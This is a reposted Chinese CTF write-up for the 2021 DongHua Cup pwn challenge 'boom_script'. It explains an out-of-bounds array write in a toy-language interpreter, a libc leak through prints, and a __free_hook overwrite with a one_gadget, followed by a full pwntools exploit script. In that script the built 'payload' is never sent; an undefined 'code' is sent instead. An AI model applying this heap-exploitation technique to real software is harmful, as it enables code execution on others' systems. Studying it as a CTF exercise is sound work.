首页 > 其他分享> 文章详细

2021 东华杯 pwn boom_script

2022-01-19 10:32:00 阅读：158 来源： 互联网

标签：arr script libc base 2021 str pwn payload lambda

在这里插入图片描述
RELRO没开。

在这里插入图片描述
程序本身的逻辑是实现了一个boom语言的编译器，我们输入boom语言会给我们编译。

但是对于我们做题人来讲，因为程序体量太大，我们逆向起来会非常麻烦，所以我们结合他一些可能会出漏洞的地方，进行一些猜测并尝试。

我们最后将漏洞点放在了他的array，也就是数组的地方。
猜测他数组可以造成越界。

我们来检查一下对不对。

我们就简单的

array arr[30];
arr[25]=1;
arr[26]=1;
arr[27]=1;
arr[28]=1;
arr[29]=1;
arr[32]=1;

在这里插入图片描述
我们明显发现有越界，现在的问题就是如何能把这个越界利用起来。

首先我们要再去看一下malloc、free函数是在什么情况下使用的，便于我们使用数组越界进行利用。

在这里插入图片描述

在这里插入图片描述
我们结合代码，结合我们的调试我们发现，字符串的赋值功能就是释放掉原来的chunk然后再申请一个chunk。

我们通过阅读代码发现
在这里插入图片描述
程序通过这个地方来决定使用的是什么功能。

我们要注意到prints功能。
在这里插入图片描述注意到prints的功能对应的数字是0x8a

找到实现这个功能的函数
在这里插入图片描述我们可以通过prints一个小字符串，来泄露chunk残留的libc地址。

那么我们的利用过程如下：

通过字符串赋值来获得一个大点的chunk。然后通过prints泄露libc地址
在这里插入图片描述
剩下的我们就正常还是通过赋值得到chunk然后越界写就好了。

exp部分有参考小绿草的大佬，表示感谢！

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 1
if local:
    r = process('./boom_script')
else:
    r = remote("192.168.40.178",8999)
    
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


payload = ""
payload += "array a[1];"
payload += "array b[1];"
payload += "str=\""+"a"*0x500+"\";"
payload += "str=\""+"a"*0x800+"\";"
payload += "prints(\" \");"
payload += "libc_base=0;"
payload += "inputn(libc_base);"
payload += "free_hook=libc_base+"+str(0x18c8)+";"
payload += "one_gadget=libc_base+"+str(0x4497f)+";"
payload += "str=\""+"a"*0x68+"\";"
payload += "str1=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x28+"\";"
payload += "str1=\""+"a"*0x28+"\";"
payload += "a[5]=free_hook;"
payload += "str3=\""+"a"*0x8+"\";"
payload += "array c[0];"
payload += "c[0]=one_gadget;"
payload += "str1=\""+"\x00"*0x8+"\";"

sla("$", "1")
sla("length:\n", str(len(code)))
debug()
sla("code:\n", code)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00')
lg("libc_base", libc_base)

sd(p64(libc_base))

ti()

标签：arr,script,libc,base,2021,str,pwn,payload,lambda
来源： https://blog.csdn.net/yongbaoii/article/details/121511700

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

ICode9

2021 东华杯 pwn boom_script